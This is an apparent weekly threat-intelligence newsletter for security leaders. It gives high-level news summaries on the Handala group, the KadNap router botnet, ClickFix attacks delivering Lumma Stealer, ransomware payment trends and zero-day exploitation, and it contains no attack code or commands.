IronCORE Recon Weekly

This Week's Overview

This week’s threat landscape reflects three converging trends shaping enterprise cyber risk: the weaponization of AI-assisted attack workflows, increased geopolitical cyber activity linked to Middle East tensions, and continued expansion of commodity malware ecosystems targeting endpoints and edge devices.

Operationally, adversaries are shifting away from noisy mass exploitation toward more resilient infrastructure and deception‑driven initial access techniques. Several campaigns observed this week demonstrate a move toward stealthier command‑and‑control models and socially engineered execution chains designed to bypass traditional endpoint protections. At the strategic level, geopolitical tensions continue to drive disruptive cyber activity by state‑aligned actors, while financially motivated groups continue to professionalize botnet and credential‑theft operations.

Security teams should prioritize monitoring of edge infrastructure, credential theft indicators, and abnormal endpoint command execution patterns. Additionally, organizations should assume increased experimentation by adversaries leveraging AI-assisted automation across reconnaissance and exploitation phases.

Key Articles & Threat Summaries

1. Iranian Cyber Group “Handala” Escalates Operations

Recent cyber operations attributed to the Iranian-linked group Handala highlight the growing role of hacktivist fronts as deniable instruments of state cyber activity. The group reportedly disrupted operations at a major medical technology company and continues targeting Israeli and Western interests amid regional tensions. WIRED

Why it Matters
Handala exemplifies a hybrid model combining hacktivism, psychological influence, and disruptive cyber operations. The activity aligns with broader patterns of Iranian cyber retaliation campaigns targeting critical infrastructure and technology sectors.

Key Takeaways

• Likely ties to Iran’s Ministry of Intelligence operations.
• Disruption-focused campaigns combined with propaganda amplification.
• Potential targeting of medical, industrial, and surveillance infrastructure.

2. KadNap Router Botnet Expands via Edge Infrastructure

Researchers identified a growing botnet known as KadNap, which has compromised over 14,000 routers—many of them ASUS devices. The malware uses the Kademlia distributed hash table (DHT) protocol to conceal command‑and‑control infrastructure, making detection and takedown more difficult. IT Pro

Why it Matters
Edge devices continue to represent one of the weakest points in enterprise and small‑business networks. By embedding command infrastructure within peer‑to‑peer systems, attackers gain resilience against traditional C2 disruption strategies.

Key Takeaways

• Over 14,000 infected routers globally.
• C2 communication hidden within peer‑to‑peer network traffic.
• Botnet access reportedly sold via proxy infrastructure for further attacks.

3. ClickFix Campaign Evolves with Windows Terminal Execution

Microsoft researchers report a new variant of ClickFix social engineering attacks that now instruct victims to execute malicious commands through Windows Terminal instead of the traditional Run dialog. The infection chain deploys the Lumma Stealer, a credential‑harvesting malware targeting browser data and cryptocurrency wallets. TechRadar

Why it Matters
The technique highlights the continuing evolution of user‑assisted malware execution. By leveraging trusted system utilities and interactive instructions, attackers bypass many automated detection controls.

Key Takeaways

• Social engineering used to trigger command‑line execution.
• Payload typically installs Lumma credential‑stealing malware.
• Targets browser credentials, cookies, and cryptocurrency wallets.

4. Surge in Ransomware Payments Signals Persistent Criminal Leverage

Recent industry data shows that 24.3% of organizations paid ransomware demands in 2025, a significant increase from the prior year. The shift is attributed partly to AI‑assisted targeting that allows attackers to identify high‑value data and operational pressure points. The Times

Why it Matters
The increase suggests ransomware operators are refining their targeting rather than expanding attack volume. Operational disruption—especially in manufacturing and industrial sectors—continues to drive payment decisions.

Key Takeaways

• Average ransom payments approaching $296K.
• Operational disruption remains the strongest pressure tactic.
• AI increasingly used to tailor victim targeting.

5. Zero‑Day Exploitation Shifts Toward Enterprise Platforms

Security research indicates 90 zero‑day vulnerabilities were exploited in the wild in 2025, with nearly half targeting enterprise infrastructure rather than browsers. Attackers are focusing on operating systems, networking devices, and security appliances for persistent access. TechRadar, IT Pro

Why it Matters
This shift reflects adversaries prioritizing footholds that provide broad network visibility and long‑term persistence rather than opportunistic browser exploits.

Key Takeaways

• Enterprise technologies represented nearly half of exploited zero‑days.
• Security appliances and networking gear increasingly targeted.
• Both nation‑state and commercial surveillance actors active.

Strategic Implications for Security Leaders

1. Edge Infrastructure Is the New Initial Access Layer

Routers, VPN gateways, and security appliances are becoming primary entry points due to their high privilege levels and weak patch hygiene.

2. Social Engineering + Legitimate Tools = Reliable Malware Delivery

Campaigns increasingly rely on user‑executed commands rather than exploit kits, reducing reliance on vulnerabilities.

3. Geopolitical Tensions Are Driving Cyber Activity

Nation‑state aligned groups are expanding disruptive cyber operations alongside conventional conflict.

4. AI Is Accelerating Both Offensive and Defensive Cycles

Attackers are using automation to improve reconnaissance, targeting, and exploit development, forcing defenders to adopt proactive detection and resilience strategies.